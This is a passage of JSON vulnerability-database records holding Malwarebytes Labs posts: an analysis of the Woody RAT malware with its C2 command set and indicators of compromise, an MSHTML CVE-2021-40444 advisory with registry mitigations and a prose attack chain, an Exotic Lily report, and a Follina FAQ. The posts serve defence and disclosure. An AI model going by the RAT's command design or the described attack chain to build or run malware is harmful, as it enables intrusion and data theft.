"bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-22T19:16:56", "id": "MALWAREBYTES:801E20618F96EF51F9E60F7BC7906C2B", "href": "https://blog.malwarebytes.com/reports/2021/09/mshtml-attack-targets-russian-state-rocket-centre-and-interior-ministry/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-08T14:51:13", "description": "_This blog post was authored by Ankur Saini and Hossein Jazi_\n\nThe Malwarebytes Threat Intelligence team has identified a new Remote Access Trojan we are calling Woody Rat that has been in the wild for at least one year.\n\nThis advanced custom Rat is mainly the work of a threat actor that targets Russian entities by using lures in archive file format and more recently Office documents leveraging the Follina vulnerability.\n\nBased on a fake domain registered by the threat actors, we know that they tried to target a Russian aerospace and defense entity known as [OAK](<https://en.wikipedia.org/wiki/United_Aircraft_Corporation>).\n\nIn this blog post, we will analyze Woody Rat's distribution methods, capabilities as well as communication protocol.\n\n## Distribution methods\n\nBased on our knowledge, Woody Rat has been distributed using two different formats: archive files and Office documents using the Follina vulnerability.\n\nThe earliest versions of this Rat was typically archived into a zip file pretending to be a document specific to a Russian group. When the Follina vulnerability became known to the world, the threat actor switched to it to distribute the payload, as identified by [@MalwareHunterTeam](<https://twitter.com/malwrhunterteam/status/1534184385313923072>).\n\nThe following diagram shows the overall attack flow used by the threat actor to drop Woody Rat:\n\n[](<https://www.malwarebytes.com/blog/images/uploads/2022/08/figure1.png>) Woody Rat distribution methods\n\n**Archive files**\n\nIn this method, Woody Rat is packaged into an archive file and sent to victims. We believe that these archive files have been distributed using spear phishing emails. Here are some examples of these archive files:\n\n * _anketa_brozhik.doc.zip_: It contains Woody Rat with the same name: _Anketa_Brozhik.doc.exe_.\n * _zayavka.zip_: It contains Woody Rat pretending to be an application (application for participation in the _selection.doc.exe_).\n\n**Follina vulnerability**\n\nThe threat actor is using a Microsoft Office document (_\u041f\u0430\u043c\u044f\u0442\u043a\u0430.docx_) that has weaponized with the Follina (CVE-2022-30190) vulnerability to drop Woody Rat. The used lure is in Russian is called \"_Information security memo_\" which provide security practices for passwords, confidential information, etc.\n\n[](<https://www.malwarebytes.com/blog/images/uploads/2022/08/figure2.png>) Document lure\n\n## Woody Rat Analysis\n\nThe threat actor has left some debugging information including a pdb path from which we derived and picked a name for this new Rat:\n\n[](<https://www.malwarebytes.com/blog/images/uploads/2022/08/figure3.png>) Debug Information\n\nA lot of CRT functions seem to be statically linked, which leads to IDA generating a lot of noise and hindering analysis. Before initialization, the malware effectively suppresses all error reporting by calling SetErrorMode with 0x8007 as parameter.\n\n[](<https://www.malwarebytes.com/blog/images/uploads/2022/08/figure4.png>) main function\n\nAs we will see later, that malware uses multiple threads and so it allocates a global object and assigns a mutex to it to make sure no two clashing operations can take place at the same time. This object enforces that only one thread is reaching out to the C2 at a given time and that there are no pending requests before making another request.\n\n### Deriving the Cookie\n\nThe malware communicates with its C2 using HTTP requests. To uniquely identify each infected machine, the malware derives a cookie from machine specific values. The values are taken from the adapter information, computer name and volume information, and 8 random bytes are appended to this value to avoid any possible cookie collisions by the malware.\n\nA combination of _GetAdaptersInfo_, _GetComputerNameA_ and _GetVolumeInformationW_ functions are used to retrieve the required data to generate the cookie. This cookie is sent with every HTTP request that is made to the C2.\n\n[](<https://www.malwarebytes.com/blog/images/uploads/2022/08/figure5.png>) get_cookie_data function\n\n### Data encryption with HTTP requests\n\nTo evade network-based monitoring the malware uses a combination of RSA-4096 and AES-CBC to encrypt the data sent to the C2. The public key used for RSA-4096 is embedded inside the binary and the malware formulates the RSA public key blob at runtime using the embedded data and imports it using the _BCryptImportKeyPair_ function.\n\nThe malware derives the key for AES-CBC at runtime by generating 32 random bytes; these 32 bytes are then encrypted with RSA-4096 and sent to the C2. Both the malware and C2 simultaneously use these bytes to generate the AES-CBC key using _BCryptGenerateSymmetricKey_ which is used in subsequent HTTP requests to encrypt and decrypt the data. For encryption and decryption the malware uses _BCryptEncrypt_ and _BCryptDecrypt_ respectively.\n\n[](<https://www.malwarebytes.com/blog/images/uploads/2022/08/figure6.png>) RSA Encryption routine\n\n[](<https://www.malwarebytes.com/blog/images/uploads/2022/08/figure7.png>) AES Encryption Routine\n\n### C2 HTTP endpoint request\n\n**knock** \\- This is the first HTTP request that the malware makes to the C2. The machine-specific cookie is sent as part of the headers here. This is a POST request and the data of this request contains 32 random bytes which are used to derive AES-CBC key, while the 32 bytes are RSA-4096 encrypted.\n\nThe data received as response for this request is decrypted and it contains the url path to submit (/submit) the additional machine information which the malware generates after this operation.\n\n[](<https://www.malwarebytes.com/blog/images/uploads/2022/08/figure8.png>) knock request headers\n\n**submit **\\- This endpoint request is used to submit information about the infected machine. The data sent to the C2 is AES-CBC encrypted. [Data](<https://gist.github.com/kernelm0de/fd018d58ebe78f603a13b2eba7f01917>) sent via submit API includes:\n\n * OS\n * Architecture\n * Antivirus installed\n * Computer Name\n * OS Build Version\n * .NET information\n * PowerShell information\n * Python information (Install path, version etc.)\n * Storage drives - includes Drive path, Internal name etc.\n * Environment Variables\n * Network Interfaces\n * Administrator privileges\n * List of running processes\n * Proxy information\n * Username\n * List of all the User accounts\n\nThe malware currently detects 6 AVs through Registry Keys; these AVs being Avast Software, Doctor Web, Kaspersky, AVG, ESET and Sophos.\n\n**ping** \\- The malware makes a ping GET http request to the C2 at regular intervals. If the C2 responds with \"_CRY\" then the malware proceeds to send the knock request again but if the C2 responds with \"_ACK\" the response contains additional information about which command should be executed by the malware.\n\nThe malware supports a wide variety of commands which are classified into _SET and _REQ requests as seen while analyzing the malware. We will dive into all these commands below in the blog.\n\n### C2 Commands\n\nThe malware uses a specific thread to communicate with the C2 and a different one to execute the commands received from the C2. To synchronize between both threads, the malware leverages events and mutex. To dispatch a command it modifies the state of the event linked to that object. We should note all the communications involved in these commands are AES encrypted.\n\n[](<https://www.malwarebytes.com/blog/images/uploads/2022/08/figure9.png>) Command execution routine\n\n**_SET Commands**\n\n * **PING** \\- This command is used to set the sleep interval between every ping request to the C2.\n * **PURG** \\- Unknown command\n * **EXIT** \\- Exit the command execution thread.\n\n**_REQ Commands**\n\n * **EXEC** (Execute)- Executes the command received from the C2 by creating a cmd.exe process, the malware creates two named pipes and redirects the input and output to these pipes. The output of the command is read using _ReadFile_ from the named pipe and then \"_DAT\" is appended to this data before it is AES encrypted and sent to the C2.\n\n[](<https://www.malwarebytes.com/blog/images/uploads/2022/08/figure10.png>) EXEC command\n\n * **UPLD** (Upload) - The Upload command is used to remotely upload a file to the infected machine. The malware makes a GET request to the C2 and receives data to be written as file.\n * **INFO** (Submit Information) - The INFO command is similar to the \"submit\" request above; this command sends the exact information to the C2 as sent by the \"submit\" request.\n\n INFO command\n\n * **UPEX** (Upload and Execute) - This is a combination of UPLD and EXEC command. The commands first writes a file received from the C2 and then executes that file.\n * **DNLD** (Download) - The DNLD command allows the C2 to retrieve any file from the infected machine. The malware encrypts the requested file and sends the data via a POST request to the C2.\n * **PROC** (Execute Process) - The PROC command is similar to the EXEC command with slight differences, here the process is directly executed instead of executing it with cmd.exe as in EXEC command. The command uses the named pipes in similar fashion as used by the EXEC command.\n * **UPPR** (Upload and Execute Process) - This is a combination of UPLD and PROC command. The command receives the remote file using the upload command then executes the file using PROC command.\n * **SDEL** (Delete File) - This is used to delete any file on the infected system. It also seems to overwrite the first few bytes of the file to be deleted with random data.\n * **_DIR** (List directory) - This can list all the files and their attributes in a directory supplied as argument. If no directory is supplied, then it proceeds to list the current directory. File attributes retrieved by this command are: \n * Filename\n * Type (Directory, Unknown, File)\n * Owner\n * Creation time\n * Last access time\n * Last write time\n * Size\n * Permissions\n * **STCK** (Command Stack) - This allows the attacker to execute multiple commands with one request. The malware can receive a STCK command which can have multiple children commands which are executed in the same order they are received by the malware.\n * **SCRN** (Screenshot) - This command leverages Windows GDI+ to take the screenshot of the desktop. The image is then encrypted using AES-CBC and sent to the C2.\n * **INJC** (Process Injection) - The malware seems to generate a new AES key for this command. The code to be injected is received from the C2 and decrypted. To inject the code into the target process it writes it to the remote memory using WriteProcessMemory and then creates a remote thread using CreateRemoteThread.\n\n[](<https://www.malwarebytes.com/blog/images/uploads/2022/08/figure12.png>) INJC routine\n\n * **PSLS** (Process List) - Calls _NtQuerySystemInformation_ with _SystemProcessInformation_ to retrieve an array containing all the running processes. Information sent about each process to the C2: \n * PID\n * ParentPID\n * Image Name\n * Owner\n * **DMON** (Creates Process) - The command seems similar to PROC with the only difference being the output of the process execution is not sent back to the C2. It receives the process name from the C2 and executes it using CreateProcess.\n * **UPDM** (Upload and Create Process) - Allows the C2 and upload a file and then execute it using DMON command.\n\n**SharpExecutor and PowerSession Commands**\n\nInterestingly, the malware has 2 .NET DLLs embedded inside. These DLLs are named _WoodySharpExecutor_ and _WoodyPowerSession_ respectively. _WoodySharpExecutor_ provides the malware ability to run .NET code received from the C2. _WoodyPowerSession_ on the other hand allows the malware to execute PowerShell commands and scripts received from the C2.\n\n_WoodyPowerSession_ makes use of pipelines to execute these PS commands. The .NET dlls are loaded by the malware and commands are executed via the methods present in these DLLs:\n\n[](<https://www.malwarebytes.com/blog/images/uploads/2022/08/figure13.png>) SharpExecutor and PowerSession methods\n\nWe will look at the commands utilising these DLLs below:\n\n * **DN_B** (DotNet Binary) - This command makes use of the RunBinaryStdout method to execute Assembly code with arguments received from the C2. The code is received as an array of Base64 strings separated by 0x20 character.\n * **DN_D** (DotNet DLL) - This method provides the attacker a lot more control over the execution. An attacker can choose whether to send the console output back to the C2 or not. The method receives an array of Base64 strings consisting of code, class name, method name and arguments. The DLL loads the code and finds and executes the method based on other arguments received from the C2.\n * **PSSC** (PowerSession Shell Command) - Allows the malware to receive a Base64 encoded PowerShell command and execute it.\n * **PSSS** (PowerSession Shell Script) - This command allows the malware to load and execute a Base64 encoded PowerShell script received from the C2.\n * **PSSM** (PowerSession Shell Module) - This command receives an array of Base64 encoded strings, one of which contains the module contents and the other one contains the module name. These strings are decoded and this module is imported to the command pipeline and then invoked.\n\n### Malware Cleanup\n\nAfter creating the command threads, the malware deletes itself from disk. It uses the more commonly known _ProcessHollowing_ technique to do so. It creates a suspended notepad process and then writes shellcode to delete a file into the suspended process using _NtWriteVirtualMemory_. The entry point of the thread is set by using the _NtSetContextThread_ method and then the thread is resumed. This leads to the deletion of the malware from disk.\n\n[](<https://www.malwarebytes.com/blog/images/uploads/2022/08/figure14.png>) Malware deletes itself\n\n## Unknown threat actor\n\nThis very capable Rat falls into the category of unknown threat actors we track. Historically, Chinese APTs such as Tonto team as well as North Korea with Konni have targeted Russia. However, based on what we were able to collect, there weren't any solid indicators to attribute this campaign to a specific threat actor.\n\nMalwarebytes blocks the Follina exploit that is being leveraged in the latest Woody Rat campaign. We also already detected the binary payloads via our heuristic malware engines.\n\n\n\n## IOCs\n\n**Woody****Rat**:\n\n * 982ec24b5599373b65d7fec3b7b66e6afff4872847791cf3c5688f47bfcb8bf0\n * 66378c18e9da070629a2dbbf39e5277e539e043b2b912cc3fed0209c48215d0b\n * b65bc098b475996eaabbb02bb5fee19a18c6ff2eee0062353aff696356e73b7a\n * 43b15071268f757027cf27dd94675fdd8e771cdcd77df6d2530cb8e218acc2ce\n * 408f314b0a76a0d41c99db0cb957d10ea8367700c757b0160ea925d6d7b5dd8e\n * 0588c52582aad248cf0c43aa44a33980e3485f0621dba30445d8da45bba4f834\n * 5c5020ee0f7a5b78a6da74a3f58710cba62f727959f8ece795b0f47828e33e80\n * 3ba32825177d7c2aac957ff1fc5e78b64279aeb748790bc90634e792541de8d3\n * 9bc071fb6a1d9e72c50aec88b4317c3eb7c0f5ff5906b00aa00d9e720cbc828d\n\n**C2s:**\n\n * kurmakata.duckdns[.]org\n * microsoft-ru-data[.]ru\n * 194.36.189.179\n * microsoft-telemetry[.]ru\n * oakrussia[.]ru\n\n**Follina Doc:** \n\u041f\u0430\u043c\u044f\u0442\u043a\u0430.docx \nffa22c40ac69750b229654c54919a480b33bc41f68c128f5e3b5967d442728fb \n**Follina html file:** \ngarmandesar.duckdns[.]org:444/uoqiuwef.html \n**Woody Rat url:** \nfcloud.nciinform[.]ru/main.css (edited)", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-08-03T21:00:00", "type": "malwarebytes", "title": "Woody RAT: A new feature-rich malware spotted in the wild", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-08-03T21:00:00", "id": "MALWAREBYTES:A92CA3CF06DBCD086A388A462B770E3B", "href": "https://www.malwarebytes.com/blog/news/2022/08/woody-rat-a-new-feature-rich-malware-spotted-in-the-wild", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-13T12:35:29", "description": "Several researchers have independently reported a 0-day remote code execution vulnerability in MSHTML to Microsoft. The reason it was reported by several researchers probably lies in the fact that a limited number of attacks using this vulnerability have been identified, as per Microsoft\u2019s [security update](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>). \n\n> Microsoft is aware of targeted attacks that attempt to exploit this vulnerability by using specially-crafted Microsoft Office documents.\n\nMSHTML is a software component used to render web pages on Windows. Although it&#x27;s most commonly associated with Internet Explorer, it is also used in other software including versions of Skype, Microsoft Outlook, Visual Studio, and others.\n\nMalwarebytes, as shown lower in this article, blocks the related malicious powershell code execution.\n\n### CVE-2021-40444\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). This one has been assigned the designation [CVE-2021-40444](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40444>) and received a CVSS score of 8.8 out of 10. The CVSS standards are used to help security researchers, software users, and vulnerability tracking organizations measure and report on the severity of vulnerabilities. CVSS can also help security teams and developers prioritize threats and allocate resources effectively.\n\nThe Cybersecurity and Infrastructure Security Agency took to Twitter to [encourage](<https://twitter.com/USCERT_gov/status/1435342618704191491>) users and organizations to review Microsoft&#x27;s mitigations and workarounds to address CVE-2021-40444.\n\n### ActiveX\n\nBecause MSHTML is the beating heart of Internet Explorer, the vulnerability also exists in that browser. Although given its limited use, there is little risk of infection by that vector. Microsoft Office applications however, use the MSHTML component to display web content in Office documents.\n\nThe attack depends on MSHTML loading a specially crafted ActiveX control when the target opens a malicious Office document. The loaded ActiveX control can then run arbitrary code to infect the system with more malware.\n\nSo, the attacker will have to trick the user into opening a malicious document. But we all know how good some attackers are at this.\n\n### Mitigation\n\nAt the moment all supported Windows versions are vulnerable. Since there is no patch available yet, Microsoft proposes a few methods to block these attacks.\n\n * Disable the installation of all ActiveX controls in Internet Explorer via the registry. Previously-installed ActiveX controls will still run, but no new ones will be added, including malicious ones.\n * Open documents from the Internet in Protected View or Application Guard for Office, both of which prevent the current attack. This is a default setting but it may have been changed.\n\nDespite the lack of a ready patch, all versions of Malwarebytes currently block this threat, as shown below. Malwarebytes also detects the eventual payload, Cobalt Strike, and has done so for years, meaning that even if a threat actor had disabled anti-exploit, then Cobalt Strike itself would still be detected. \n\n\n\nA screenshot from Malwarebytes Teams showing active detection of this threat\n\nA screenshot from Malwarebytes Nebula showing active detection of this threat\n\nA screenshot of Malwarebytes Teams blocking the final payload\n\nA screenshot of Malwarebytes Anti-Exploit blocking the exploit payload process\n\n### Registry changes\n\nModifying the registry may create unforeseen results, so create a backup before you change it! It may also come in handy when you want to undo the changes at a later point.\n\nTo create a backup, open Regedit and drill down to the key you want to back up (if it exists):\n\n`HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones`\n\nRight click the key in the left side of the registry pane and select &quot;Export&quot;. Follow the prompts and save the created reg file with a name and in a location where you can easily find it.\n\n\n\nTo make the recommended changes, open a text file and paste in the following script. Make sure that all of the code box content is pasted into the text file!\n \n \n Windows Registry Editor Version 5.00\n \n [HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0]\n \"1001\"=dword:00000003\n \"1004\"=dword:00000003\n \n [HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1]\n \"1001\"=dword:00000003\n \"1004\"=dword:00000003\n \n [HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2]\n \"1001\"=dword:00000003\n \"1004\"=dword:00000003\n \n [HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3]\n \"1001\"=dword:00000003\n \"1004\"=dword:00000003\n \n\nSave the file with a .reg file extension. Right-click the file and select Merge. You&#x27;ll be prompted about adding the information to the registry, agree, and then reboot your machine.\n\n## Update september 9, 2021\n\nIt has taken researchers only a few days to circumvent the mitigations proposed by Microsoft. Once they were able to find a sample of a malicious Word document, they have started analyzing how it works and along the way poked holes in the defense strategies proposed by Microsoft.\n\nOne of the wobbly pillars is the Mark-of-the-Web (MoTW) flag that is given to downloaded files. This only blocks the exploit unless a user clicks on the &#x27;Enable Editing&#x27; buttons. Sadly, experience has learned us that it is not a good idea to trust that they won&#x27;t do that. Another problem with this flag is that it doesn&#x27;t survive when it is handled by other applications, like for example, unzipping. Another problem are certain filetypes that use the same MSHTML to view webcontent, but are not protected by Office&#x27;s Protected View security feature. Researcher [Will Dormann](<https://twitter.com/wdormann/status/1435951560006189060>) was able to replicate the attasck using an RTF file.\n\nThe registry fix we posted to prevent ActiveX controls from running in Internet Explorer, were supposed to effectively block the current attacks. But, security researcher Kevin Beaumont has already [discovered a way](<https://twitter.com/GossiTheDog/status/1435570418623070210>) to bypass Microsoft&#x27;s current mitigations to exploit this vulnerability.\n\n### The attack chain\n\nThe researchers have also managed to reconstruct the attack chain with the use of a limited set of samples of malicious docx files. \n\n * Once a user clicks on the &#x27;Enable Editing&#x27; button, the exploit will load a _side.html_ file by using the mhtml protocol to open a URL. The _side.html _file is hosted at a remote site and will be loaded as a Word template.\n * The Internet Explorer browser will be started to load the HTML, and its obfuscated JavaScript code will exploit the CVE-2021-40444 vulnerability to create a malicious ActiveX control.\n * This ActiveX control will download a _ministry.cab_ file from a remote site.\n * And extract a _championship.inf_ file, which is actually a DLL, and execute it as a CPL file by using rundll32.exe.\n * The ultimate payload is a Cobalt Strike beacon, which would allow the threat actor to gain remote access to the device.\n\nGiven the few days that are left until next patch Tuesday, it is doubtful whether Microsoft will be able to come up with an effective patch.\n\nConsider me one happy camper that Malwarebytes does not rely on the MoTW flag.\n\n_This is what happened when I tried to &quot;edit&quot; the Word doc the researchers analyzed_\n\n## Update september 13, 2021\n\nAs [reported by BleepingComputer](<https://www.bleepingcomputer.com/news/microsoft/windows-mshtml-zero-day-exploits-shared-on-hacking-forums/>) threat actors are sharing PoCs, tutorials and exploits on hacking forums, so that every script kiddy and wannabe hacker can follow step-by-step instructions to build their own attacks. Since the method we mentioned that uses an RTF file even works in Windows explorer file previews. This means this vulnerability can be exploited by viewing a malicious document using the Windows Explorer preview feature.\n\nSince this was discovered, Microsoft has added the following mitigation to disable previewing of RTF and Word documents:\n\n 1. In the Registry Editor (regedit.exe), navigate to the appropriate registry key: **For Word documents, navigate to these keys:**\n * HKEY_CLASSES_ROOT.docx\\ShellEx{8895b1c6-b41f-4c1c-a562-0d564250836f}\n * HKEY_CLASSES_ROOT.doc\\ShellEx{8895b1c6-b41f-4c1c-a562-0d564250836f}\n * HKEY_CLASSES_ROOT.docm\\ShellEx{8895b1c6-b41f-4c1c-a562-0d564250836f} **For rich text files (RTF), navigate to this key:**\n * HKEY_CLASSES_ROOT.rtf\\ShellEx{8895b1c6-b41f-4c1c-a562-0d564250836f}\n 2. Export a copy of the Registry key as a backup.\n 3. Now double-click **Name** and in the **Edit String** dialog box, delete the Value Data.\n 4. Click **OK**,\n\nWord document and RTF file previews are now disabled in Windows Explorer.\n\nTo enable Windows Explorer preview for these documents, double-click on the backup .reg file you created in step 2 above.\n\nStay safe,everyone!\n\nThe post [[updated] Windows MSHTML zero-day actively exploited, mitigations required](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/windows-mshtml-zero-day-actively-exploited-mitigations-required/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {}, "published": "2021-09-08T11:04:07", "type": "malwarebytes", "title": "[updated] Windows MSHTML zero-day actively exploited, mitigations required", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-08T11:04:07", "id": "MALWAREBYTES:DB54B348AF1AC41987150B5CE7B1BC66", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/windows-mshtml-zero-day-actively-exploited-mitigations-required/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-03-18T23:27:45", "description": "The Google Threat Analysis Group (TAG) has shared their observations about a group of cybercriminals called Exotic Lily. This group has specialized itself as an initial access broker, which means they find a vulnerability in an organization&#x27;s defenses, exploit that vulnerability, and sell the access to the victim&#x27;s network to an interested party, several times over with different victims.\n\nAmong these interested parties TAG found the [Conti](<https://blog.malwarebytes.com/threat-spotlight/2021/05/threat-spotlight-conti-the-ransomware-used-in-the-hse-healthcare-attack/>) and Diavol ransomware groups. Because Exotic Lily&#x27;s methods involved a lot of detail, they are believed to require a level of human interaction that is rather unusual for cybercrime groups focused on large scale operations.\n\n## Initial access broker\n\nLike in any maturing industry, you can expect to see specialization and diversification. Initial access brokers are an example of specialized cybercriminals. They will use a vulnerability to gain initial access, and, probably based on the nature of the target, sell this access to other cybercriminals that can use this access to deploy their specific malware.\n\nThese initial access brokers are different from the usual ransomware affiliates that will deploy the ransomware they are affiliated with themselves and use the infrastructure provided by the ransomware as a service (RaaS) group to get a chunk of the ransom if the victim decides to pay. The RaaS will provide the encryption software, the contact and leak sites, and negotiate the ransom with the victim. An initial access broker will inform another cybercriminal by letting them know they have found a way in at company xyz, and inquire how much they are willing to pay for that access.\n\n## Exotic Lily\n\nFrom the [TAG blog](<https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti/>) we can learn that Exotic Lily was very much specialized. Their initial attack vector was email. Initially, they were targeting specific industries such as IT, cybersecurity, and healthcare, but that focus has become less stringent.\n\nTheir email campaigns gained credibility by spoofing companies and employees. Their email campaigns were targeted to a degree that they are believed to be sent by real human operators using little to no automation. To evade detection mechanisms they used common services like WeTransfer, TransferNow, and OneDrive to deliver the payload.\n\nLast year, researchers found that Exotic Lily used the vulnerability listed as [CVE-2021-40444](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40444>), a Microsoft MSHTML Remote Code Execution (RCE) vulnerability. Microsoft also posted a [blog](<https://www.microsoft.com/security/blog/2021/09/15/analyzing-attacks-that-exploit-the-mshtml-cve-2021-40444-vulnerability/>) about attacks that exploited this vulnerability. Later, the group shifted to using customized versions of [BazarLoader](<https://blog.malwarebytes.com/detections/trojan-bazar/>) delivered inside ISO files.\n\nBased on the fact that the Exotic Lily\u2019s operations require a lot of human interaction, the researchers did an analysis of the \u201cworking hours\u201d and came to the conclusion that it looks like a regular 9 to 5 operation located in a Central or Eastern Europe time zone.\n\n## Social engineering\n\nAs with most email campaigns the amount of social engineering largely defines how successful such a campaign can be. Between the millions of emails sent in a &quot;spray-and-pray&quot; attack, to the thousands that Exotic Lily sends out per day, there is a huge difference in success rate.\n\nExotic Lily used identity [spoofing](<https://blog.malwarebytes.com/cybercrime/2016/06/email-spoofing/>) where they replaced the TLD for a legitimate domain and replaced it with \u201c.us\u201d, \u201c.co\u201d or \u201c.biz\u201d. At first, the group would create entirely fake personas posing as employees of a real company. These personas would come including social media profiles, personal websites, and AI generated profile pictures. That must have been a lot of work, so at some point the group started to impersonate real company employees by copying their personal data from social media and business databases such as RocketReach and CrunchBase.\n\nUsing such spoofed accounts, the attackers would send [spear phishing](<https://blog.malwarebytes.com/social-engineering/2020/01/spear-phishing-101-what-you-need-to-know/>) emails with a business proposal and even engage in further communication with the target by attempting to schedule a meeting to discuss the project&#x27;s design or requirements.\n\n## IOC\u2019s\n\nSHA-256 hashes of the **BazarLoader** ISO samples:\n\n * 5ceb28316f29c3912332065eeaaebf59f10d79cd9388ef2a7802b9bb80d797be\n * 9fdec91231fe3a709c8d4ec39e25ce8c55282167c561b14917b52701494ac269\n * c896ee848586dd0c61c2a821a03192a5efef1b4b4e03b48aba18eedab1b864f7\n\nSHA-256 hashes of the **BUMBLEBEE** ISO samples:\n\n * 9eacade8174f008c48ea57d43068dbce3d91093603db0511467c18252f60de32\n * 6214e19836c0c3c4bc94e23d6391c45ad87fdd890f6cbd3ab078650455c31dc8\n * 201c4d0070552d9dc06b76ee55479fc0a9dfacb6dbec6bbec5265e04644eebc9\n * 1fd5326034792c0f0fb00be77629a10ac9162b2f473f96072397a5d639da45dd\n * 01cc151149b5bf974449b00de08ce7dbf5eca77f55edd00982a959e48d017225\n\n**IP** address of the [C&amp;C server](<https://blog.malwarebytes.com/glossary/cc/>):\n\n * 23.81.246.187\n\nStay safe, everyone!\n\nThe post [Meet Exotic Lily, access broker for ransomware and other malware peddlers](<https://blog.malwarebytes.com/threat-spotlight/2022/03/meet-exotic-lily-access-broker-for-ransomware-and-other-malware-peddlers/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-03-18T22:58:48", "type": "malwarebytes", "title": "Meet Exotic Lily, access broker for ransomware and other malware peddlers", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-03-18T22:58:48", "id": "MALWAREBYTES:F1563A57212EB7AEC347075E94FF1605", "href": "https://blog.malwarebytes.com/threat-spotlight/2022/03/meet-exotic-lily-access-broker-for-ransomware-and-other-malware-peddlers/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-02T17:32:49", "description": "On Monday May 30, 2022, Microsoft issued [CVE-2022-30190](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190>) for a zero-day remote code vulnerability, &#x27;Follina&#x27;, already being exploited in the wild via malicious Word documents.\n\n_**Q: What exactly is Follina?**_\n\nA: Follina is the nickname given to a new vulnerability discovered as a zero-day and identified as CVE-2022-30190. In technical terms it is a Remote Code Execution Vulnerability in the Microsoft Windows Support Diagnostic Tool (MSDT).\n\n_**Q: But what does it mean, and is this a serious vulnerability?**_\n\nA: An attacker can send you a malicious Office document that will compromise your machine with malware when you open it. It is serious since it is already actively being exploited in the wild and doesn&#x27;t require users to enable macros.\n\n**_Q: What is Microsoft doing about it?_**\n\nA: Microsoft has offered [mitigation steps](<https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/>) that disable the MSDT URL Protocol. However, users should proceed with caution because of possible conflicts and crashes with existing applications.\n\n_**Q: Does Malwarebytes protect against Follina?**_\n\nA: Yes, it does. Please see additional steps below based on your product to ensure you are protected.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/06/Follina_block.png> \"\" )\n\n## How to add protection with Malwarebytes\n\nWe are working on releasing a new version of Anti-Exploit that won&#x27;t require adding new shields and will provide more holistic protection. For immediate mitigation, please follow the instructions below.\n\n### Malwarebytes Premium (Consumer)\n\nFollow the instructions below to add `sdiagnhost.exe` as a new protected application.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/06/MB4.gif> \"\" )\n\n### Malwarebytes Nebula (Enterprise)\n\nFollow the instructions below to add `sdiagnhost.exe` as a new protected application.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/06/Nebula.gif> \"\" 